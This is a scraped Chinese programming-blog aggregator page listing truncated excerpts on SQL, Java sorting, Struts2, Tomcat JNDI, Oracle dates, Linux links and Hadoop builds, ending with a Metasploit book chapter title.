SELECT DISTINCT 语句用于返回唯一不同的值。 SQL SELECT DISTINCT 语句在表中，一个列可能会包含多个重复值，有时您也许希望仅仅列出不同（distinct）的值。 DISTINCT 关键词用于返回唯一不同的值。 SQL SELECT DISTINCT 语法 SELECT DISTINCT column_name,column_name F
java冒泡排序 3213213333332132 java 冒泡排序
package com.algorithm; /** * @Description 冒泡 * @author FuJianyong * 2015-1-22上午09:58:39 */ public class MaoPao { public static void main(String[] args) { int[] mao = {17,50,26,18,9,10
struts2.18 +json,struts2-json-plugin-2.1.8.1.jar配置及问题！ 7454103 DAO spring Ajax json qq
struts2.18 出来有段时间了！（貌似是稳定版）闲时研究下下！貌似 sruts2 搭配 json 做 ajax 很吃香！实践了下下！不当之处请绕过！呵呵网上一大堆 struts2+json 不过大多的json 插件都是 jsonplugin.34.jar strut
struts2 数据标签说明 darkranger jsp bean struts servlet Scheme
数据标签主要用于提供各种数据访问相关的功能，包括显示一个Action里的属性，以及生成国际化输出等功能数据标签主要包括： action ：该标签用于在JSP页面中直接调用一个Action，通过指定executeResult参数，还可将该Action的处理结果包含到本页面来。 bean ：该标签用于创建一个javabean实例。如果指定了id属性，则可以将创建的javabean实例放入Sta
链表.简单的链表节点构建 aijuans 编程技巧
/*编程环境WIN-TC*/ #include "stdio.h" #include "conio.h" #define NODE(name, key_word, help) \ Node name[1]={{NULL, NULL, NULL, key_word, help}} typedef struct node { &nbs
tomcat下jndi的三种配置方式 avords tomcat
jndi(Java Naming and Directory Interface，Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API。命名服务将名称和对象联系起来，使得我们可以用名称访问对象。目录服务是一种命名服务，在这种服务里，对象不但有名称，还有属性。 tomcat配置
关于敏捷的一些想法 houxinyou 敏捷
从网上看到这样一句话：“敏捷开发的最重要目标就是：满足用户多变的需求，说白了就是最大程度的让客户满意。” 感觉表达的不太清楚。感觉容易被人误解的地方主要在“用户多变的需求”上。第一种多变，实际上就是没有从根本上了解了用户的需求。用户的需求实际是稳定的，只是比较多，也比较混乱，用户一般只能了解自己的那一小部分，所以没有用户能清楚的表达出整体需求。而由于各种条件的，用户表达自己那一部分时也有
富养还是穷养，决定孩子的一生 bijian1013 教育人生
是什么决定孩子未来物质能否丰盛？为什么说寒门很难出贵子，三代才能出贵族？真的是父母必须有钱，才能大概率保证孩子未来富有吗？-----作者：@李雪爱与自由事实并非由物质决定，而是由心灵决定。一朋友富有而且修养气质很好，兄弟姐妹也都如此。她的童年时代，物质上大家都很贫乏，但妈妈总是保持生活中的美感，时不时给孩子们带回一些美好小玩意，从来不对孩子传递生活艰辛、金钱来之不易、要懂得珍惜
oracle 日期时间格式转化征客丶 oracle
oracle 系统时间有 SYSDATE 与 SYSTIMESTAMP； SYSDATE：不支持毫秒，取的是系统时间； SYSTIMESTAMP：支持毫秒，日期，时间是给时区转换的，秒和毫秒是取的系统的。日期转字符窜：一、不取毫秒： TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') 简要说明， YYYY 年 MM 月
【Scala六】分析Spark源代码总结的Scala语法四 bit1129 scala
1. apply语法 FileShuffleBlockManager中定义的类ShuffleFileGroup，定义： private class ShuffleFileGroup(val shuffleId: Int, val fileId: Int, val files: Array[File]) { ... def apply(bucketId
Erlang中有意思的bug bookjovi erlang
代码中常有一些很搞笑的bug，如下面的一行代码被调用两次（Erlang beam） commit f667e4a47b07b07ed035073b94d699ff5fe0ba9b Author: Jovi Zhang <[email protected]> Date: Fri Dec 2 16:19:22 2011 +0100 erts:
移位打印10进制数转16进制-2008-08-18 ljy325 java 基础
/** * Description 移位打印10进制的16进制形式 * Creation Date 15-08-2008 9:00 * @author 卢俊宇 * @version 1.0 * */ public class PrintHex { // 备选字符 static final char di
读《研磨设计模式》-代码笔记-组合模式 bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; abstract class Component { public abstract void printStruct(Str
利用cmd命令将.class文件打包成jar chenyu19891124 cmd jar
cmd命令打jar是如下实现：在运行里输入cmd，利用cmd命令进入到本地的工作盘符。(如我的是D盘下的文件有此路径 D:\workspace\prpall\WEB-INF\classes) 现在是想把D:\workspace\prpall\WEB-INF\classes路径下所有的文件打包成prpall.jar。然后继续如下操作： cd D: 回车 cd workspace/prpal
[原创]JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明 comsci eclipse 设计模式算法工作 swing
JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明 &nb
SecureCRT右键粘贴的设置 daizj secureCRT 右键粘贴
一般都习惯鼠标右键自动粘贴的功能，对于SecureCRT6.7.5 ，这个功能也已经是默认配置了。老版本的SecureCRT其实也有这个功能，只是不是默认设置，很多人不知道罢了。菜单： Options->Global Options ...->Terminal 右边有个Mouse的选项块。 Copy on Select Paste on Right/Middle
Linux 软链接和硬链接 dongwei_6688 linux
1.Linux链接概念Linux链接分两种，一种被称为硬链接（Hard Link），另一种被称为符号链接（Symbolic Link）。默认情况下，ln命令产生硬链接。【硬连接】硬连接指通过索引节点来进行连接。在Linux的文件系统中，保存在磁盘分区中的文件不管是什么类型都给它分配一个编号，称为索引节点号(Inode Index)。在Linux中，多个文件名指向同一索引节点是存在的。一般这种连
DIV底部自适应 dcj3sjt126com JavaScript
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
Centos6.5使用yum安装mysql——快速上手必备 dcj3sjt126com mysql
第1步、yum安装mysql [root@stonex ~]# yum -y install mysql-server 安装结果： Installed: mysql-server.x86_64 0:5.1.73-3.el6_5 &nb
如何调试JDK源码 frank1234 jdk
相信各位小伙伴们跟我一样，想通过JDK源码来学习Java，比如collections包，java.util.concurrent包。可惜的是sun提供的jdk并不能查看运行中的局部变量，需要重新编译一下rt.jar。下面是编译jdk的具体步骤： 1.把C:\java\jdk1.6.0_26\sr
Maximal Rectangle hcx2013 max
Given a 2D binary matrix filled with 0's and 1's, find the largest rectangle containing all ones and return its area. public class Solution { public int maximalRectangle(char[][] matrix)
Spring MVC测试框架详解——服务端测试 jinnianshilongnian spring mvc test
随着RESTful Web Service的流行，测试对外的Service是否满足期望也变的必要的。从Spring 3.2开始Spring了Spring Web测试框架，如果版本低于3.2，请使用spring-test-mvc项目（合并到spring3.2中了）。 Spring MVC测试框架提供了对服务器端和客户端（基于RestTemplate的客户端）提供了支持。 &nbs
Linux64位操作系统（CentOS6.6）上如何编译hadoop2.4.0 liyong0802 hadoop
一、准备编译软件 1.在官网下载jdk1.7、maven3.2.1、ant1.9.4，解压设置好环境变量就可以用。环境变量设置如下：（1）执行vim /etc/profile （2）在文件尾部加入: export JAVA_HOME=/home/spark/jdk1.7 export MAVEN_HOME=/ho
StatusBar 字体白色 pangyulei status
[[UIApplication sharedApplication] setStatusBarStyle:UIStatusBarStyleLightContent]; /*you'll also need to set UIViewControllerBasedStatusBarAppearance to NO in the plist file if you use this method
如何分析Java虚拟机死锁 sesame java thread oracle 虚拟机 jdbc
英文资料： Thread Dump and Concurrency Locks Thread dumps are very useful for diagnosing synchronization related problems such as deadlocks on object monitors. Ctrl-\ on Solaris/Linux or Ctrl-B
位运算简介及实用技巧（一）：基础篇 tw_wangzhengquan 位运算
http://www.matrix67.com/blog/archives/263 去年年底写的关于位运算的日志是这个Blog里少数大受欢迎的文章之一，很多人都希望我能不断完善那篇文章。后来我看到了不少其它的资料，学习到了更多关于位运算的知识，有了重新整理位运算技巧的想法。从今天起我就开始写这一系列位运算讲解文章，与其说是原来那篇文章的follow-up，不如说是一个r
jsearch的索引文件结构 yangshangchuan 搜索引擎 jsearch 全文检索信息检索 word分词
jsearch是一个高性能的全文检索工具包，基于倒排索引，基于java8，类似于lucene，但更轻量级。 jsearch的索引文件结构定义如下： 1、一个词的索引由=分割的三部分组成：第一部分是词第二部分是这个词在多少

《Metasploit 魔鬼训练营》05 网络服务渗透攻击

你可能感兴趣的:(kali-linux)